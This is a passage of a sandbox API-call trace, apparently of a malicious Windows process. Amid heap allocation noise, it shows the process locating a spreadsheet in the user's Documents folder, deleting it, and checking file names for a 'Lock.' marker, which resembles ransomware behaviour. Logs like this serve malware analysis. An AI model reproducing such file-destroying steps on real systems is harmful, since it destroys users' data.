0x2e54d48 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.575] CloseHandle (hObject=0x2a0) returned 1 [0263.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0263.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0263.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0263.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0263.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0263.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0263.584] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0263.584] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0263.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0263.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0263.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e558d8 [0263.585] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Fuv1mdjpidzq-6YHGh.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Fuv1mdjpidzq-6YHGh.xlsx", lpFilePart=0x8cedf4*="Fuv1mdjpidzq-6YHGh.xlsx") returned 0x31 [0263.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0263.585] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fuv1mdjpidzq-6YHGh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fuv1mdjpidzq-6yhgh.xlsx")) returned 0x20 [0263.585] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fuv1mdjpidzq-6YHGh.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb8b5a0, ftCreationTime.dwHighDateTime=0x1d5ce6c, ftLastAccessTime.dwLowDateTime=0xe1b73c70, ftLastAccessTime.dwHighDateTime=0x1d5b5c3, ftLastWriteTime.dwLowDateTime=0xe1b73c70, ftLastWriteTime.dwHighDateTime=0x1d5b5c3, nFileSizeHigh=0x0, nFileSizeLow=0x1324e, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Fuv1mdjpidzq-6YHGh.xlsx", cAlternateFileName="FUV1MD~1.XLS")) returned 0xa87410 [0263.585] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fuv1mdjpidzq-6YHGh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fuv1mdjpidzq-6yhgh.xlsx")) returned 1 [0263.602] FindNextFileW (in: hFindFile=0xa87410, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb8b5a0, ftCreationTime.dwHighDateTime=0x1d5ce6c, ftLastAccessTime.dwLowDateTime=0xe1b73c70, ftLastAccessTime.dwHighDateTime=0x1d5b5c3, ftLastWriteTime.dwLowDateTime=0xe1b73c70, ftLastWriteTime.dwHighDateTime=0x1d5b5c3, nFileSizeHigh=0x0, nFileSizeLow=0x1324e, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Fuv1mdjpidzq-6YHGh.xlsx", cAlternateFileName="FUV1MD~1.XLS")) returned 0 [0263.602] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.603] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0263.603] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e558d8 [0263.604] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Fuv1mdjpidzq-6YHGh.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Fuv1mdjpidzq-6YHGh.xlsx", lpFilePart=0x8cf650*="Fuv1mdjpidzq-6YHGh.xlsx") returned 0x31 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0263.604] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fuv1mdjpidzq-6YHGh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fuv1mdjpidzq-6yhgh.xlsx")) returned 0xffffffff [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.604] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0263.604] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.604] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0263.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0263.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0263.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0263.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hYiEt-0f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YiEt-0f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iEt-0f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Et-0f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t-0f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-0f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0263.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0263.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0263.609] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0263.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.609] HeapFree (in: hHeap=0x970000, 